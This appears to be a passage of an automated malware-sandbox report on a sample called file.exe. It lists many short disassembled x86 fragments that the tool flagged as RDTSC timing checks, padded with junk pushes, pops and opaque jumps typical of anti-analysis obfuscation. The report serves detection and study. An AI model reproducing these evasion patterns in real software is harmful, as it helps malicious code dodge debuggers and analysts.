                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEB0F second address: CEEB7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 35D15B89h 0x00000010 mov dword ptr [ebp+122D347Ch], esi 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F1674F90E18h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 add ecx, 2D153BBAh 0x00000038 movzx ecx, bx 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D1963h], ebx 0x00000043 push 00000003h 0x00000045 jl 00007F1674F90E1Ch 0x0000004b mov dword ptr [ebp+122D1904h], ecx 0x00000051 push E3AD49C1h 0x00000056 js 00007F1674F90E20h 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC2B second address: CEEC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1675279DA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC35 second address: CEEC96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F1674F90E18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov si, 87F0h 0x0000002c push 00000000h 0x0000002e jmp 00007F1674F90E25h 0x00000033 push C52C45DCh 0x00000038 pushad 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC96 second address: CEEC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEC9A second address: CEECFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3AD3BAA4h 0x0000000e add edx, 79098B00h 0x00000014 mov dword ptr [ebp+122D1BA9h], ebx 0x0000001a push 00000003h 0x0000001c movsx edx, dx 0x0000001f push 00000000h 0x00000021 jno 00007F1674F90E1Bh 0x00000027 add cx, 79EEh 0x0000002c mov dx, cx 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1674F90E18h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ECE973F1h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEECFA second address: CEED04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEED8C second address: CEEE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1674F90E1Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D1D0Dh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1674F90E18h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push B039E4F8h 0x00000035 pushad 0x00000036 jmp 00007F1674F90E27h 0x0000003b jng 00007F1674F90E29h 0x00000041 jmp 00007F1674F90E23h 0x00000046 popad 0x00000047 add dword ptr [esp], 4FC61B88h 0x0000004e jmp 00007F1674F90E21h 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 mov ch, dh 0x00000059 push 00000003h 0x0000005b mov edx, 2084BF74h 0x00000060 call 00007F1674F90E19h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEE33 second address: CEEE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEE44 second address: CEEEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E20h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F1674F90E25h 0x00000018 jmp 00007F1674F90E1Ch 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 jmp 00007F1674F90E25h 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEA1 second address: CEEEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEAF second address: CEEEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEB3 second address: CEEEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEB9 second address: CEEF5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e jng 00007F1674F90E18h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F1674F90E18h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 ja 00007F1674F90E29h 0x00000038 lea ebx, dword ptr [ebp+124509D3h] 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1674F90E18h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 movzx edi, ax 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007F1674F90E26h 0x00000063 pop eax 0x00000064 pushad 0x00000065 push esi 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF5D second address: CEEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF69 second address: CEEF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF6E second address: CEEF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E285 second address: D0E289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E289 second address: D0E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1675279DA8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E297 second address: D0E2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E2A4 second address: D0E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1675279DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F1675279DA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E2B9 second address: D0E2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E529 second address: D0E57C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1675279DB8h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c je 00007F1675279DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007F1675279DA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1675279DA6h 0x00000027 jmp 00007F1675279DB7h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E57C second address: D0E5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F1674F90E16h 0x00000013 pushad 0x00000014 jmp 00007F1674F90E20h 0x00000019 ja 00007F1674F90E16h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EB57 second address: D0EB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EB6B second address: D0EB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EE95 second address: D0EEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EEA0 second address: D0EEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EFE3 second address: D0F01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DACh 0x00000009 jmp 00007F1675279DB8h 0x0000000e jg 00007F1675279DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007F1675279DA6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F01D second address: D0F023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F023 second address: D0F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1675279DB7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F043 second address: D0F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F2CA second address: D0F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F413 second address: D0F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F41D second address: D0F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F423 second address: D0F42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F42D second address: D0F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0716C second address: D07172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07172 second address: D0717D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0717D second address: D07188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07188 second address: D0718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5AF second address: D0F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5B6 second address: D0F5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F1675279DA6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DAFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5D2 second address: D0F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FBAA second address: D0FBFB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DCCh 0x00000008 jmp 00007F1675279DADh 0x0000000d jmp 00007F1675279DB9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F1675279DBFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FEC3 second address: D0FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1674F90E16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FECE second address: D0FF04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1675279DACh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F1675279DB7h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FF04 second address: D0FF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FF08 second address: D0FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DAEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1008D second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10091 second address: D100A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1675279DACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D100A1 second address: D100A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12DF1 second address: D12DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156C5 second address: D156CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156CF second address: D156D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEEC second address: D1BEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEF2 second address: D1BEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEFB second address: D1BF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1674F90E1Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E28h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C35F second address: D1C380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB3h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C380 second address: D1C385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C385 second address: D1C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a jmp 00007F1675279DAFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D209 second address: D1D26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1674F90E1Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1D091A3Dh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1674F90E18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D394Eh] 0x00000034 pushad 0x00000035 mov ecx, 1F15945Bh 0x0000003a mov edi, dword ptr [ebp+122D365Ah] 0x00000040 popad 0x00000041 mov esi, dword ptr [ebp+122D37B2h] 0x00000047 push 30C13DCCh 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F1674F90E18h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D5C7 second address: D1D5D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D8C7 second address: D1D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D8CC second address: D1D8D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DDC0 second address: D1DDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1674F90E16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE67 second address: D1DE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE6D second address: D1DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE71 second address: D1DE82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E107 second address: D1E116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F1674F90E1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E285 second address: D1E28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F930 second address: D1F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F934 second address: D1F949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F949 second address: D1F954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209EC second address: D209F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209F2 second address: D209F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209F8 second address: D209FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209FC second address: D20A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F1674F90E18h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D1920h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F1674F90E18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b or dword ptr [ebp+122D17C0h], edi 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jmp 00007F1674F90E26h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23037 second address: D2305A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1675279DA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22DC1 second address: D22DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2503F second address: D25051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DABh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25051 second address: D25055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
